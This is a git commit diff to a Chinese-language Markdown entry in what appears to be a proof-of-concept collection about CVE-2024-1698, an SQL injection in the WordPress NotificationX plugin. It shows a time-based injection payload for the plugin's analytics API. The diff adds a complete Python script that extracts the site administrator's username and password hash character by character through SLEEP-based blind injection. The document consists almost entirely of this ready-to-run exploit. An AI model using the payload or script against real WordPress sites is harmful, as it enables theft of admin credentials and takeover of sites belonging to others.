Update WordPress插件NotificationX存在sql注入漏洞(CVE-2024-1698).md

2024-05-01 11:59:25 +08:00 · 2024-05-01 11:59:25 +08:00 · ffad9cdfaa
commit ffad9cdfaa
parent 9ce372c889
1 changed files with 79 additions and 0 deletions
--- a/WordPress插件NotificationX存在sql注入漏洞(CVE-2024-1698).md
+++ b/WordPress插件NotificationX存在sql注入漏洞(CVE-2024-1698).md
@ -13,3 +13,82 @@ Content-Type: application/json

 {"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
 ```
+
+## 利用基本
+```python
+import requests
+import string
+from sys import exit
+
+# Sleep time for SQL payloads
+delay = 0.3
+
+# URL for the NotificationX Analytics API
+url = "http://localhost/wp-json/notificationx/v1/analytics"
+
+admin_username = ""
+admin_password_hash = ""
+
+session = requests.Session()
+
+# Find admin username length
+username_length = 0
+for length in range(1, 41):  # Assuming username length is less than 40 characters
+    resp_length = session.post(url, data={
+        "nx_id": 1337,
+        "type": f"clicks`=IF(LENGTH((select user_login from wp_users where id=1))={length},SLEEP({delay}),null)-- -"
+    })
+
+    # Elapsed time > delay if delay happened due to SQLi
+    if resp_length.elapsed.total_seconds() > delay:
+        username_length = length
+        print("Admin username length:", username_length)
+        break
+
+# Find admin username
+for idx_username in range(1, username_length + 1):
+    # Iterate over all the printable characters + NULL byte
+    for ascii_val_username in (b"\x00" + string.printable.encode()):
+        # Send the payload
+        resp_username = session.post(url, data={
+            "nx_id": 1337,
+            "type": f"clicks`=IF(ASCII(SUBSTRING((select user_login from wp_users where id=1),{idx_username},1))={ascii_val_username},SLEEP({delay}),null)-- -"
+        })
+
+        # Elapsed time > delay if delay happened due to SQLi
+        if resp_username.elapsed.total_seconds() > delay:
+            admin_username += chr(ascii_val_username)
+            # Show what we have found so far...
+            print("Admin username:", admin_username)
+            break  # Move to the next character
+    else:
+        # Null byte reached, break the outer loop
+        break
+
+# Find admin password hash
+for idx_password in range(1, 41):  # Assuming the password hash length is less than 40 characters
+    # Iterate over all the printable characters + NULL byte
+    for ascii_val_password in (b"\x00" + string.printable.encode()):
+        # Send the payload
+        resp_password = session.post(url, data={
+            "nx_id": 1337,
+            "type": f"clicks`=IF(ASCII(SUBSTRING((select user_pass from wp_users where id=1),{idx_password},1))={ascii_val_password},SLEEP({delay}),null)-- -"
+        })
+
+        # Elapsed time > delay if delay happened due to SQLi
+        if resp_password.elapsed.total_seconds() > delay:
+            admin_password_hash += chr(ascii_val_password)
+            # Show what we have found so far...
+            print("Admin password hash:", admin_password_hash)
+            # Exit condition - encountered a null byte
+            if ascii_val_password == 0:
+                print("[*] Admin credentials found:")
+                print("Username:", admin_username)
+                print("Password hash:", admin_password_hash)
+                exit(0)
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/723e8a4e-635e-4c84-ad7b-fdacb629c1ca)
+
+## 来源
+- https://github.com/kamranhasan/CVE-2024-1698-Exploit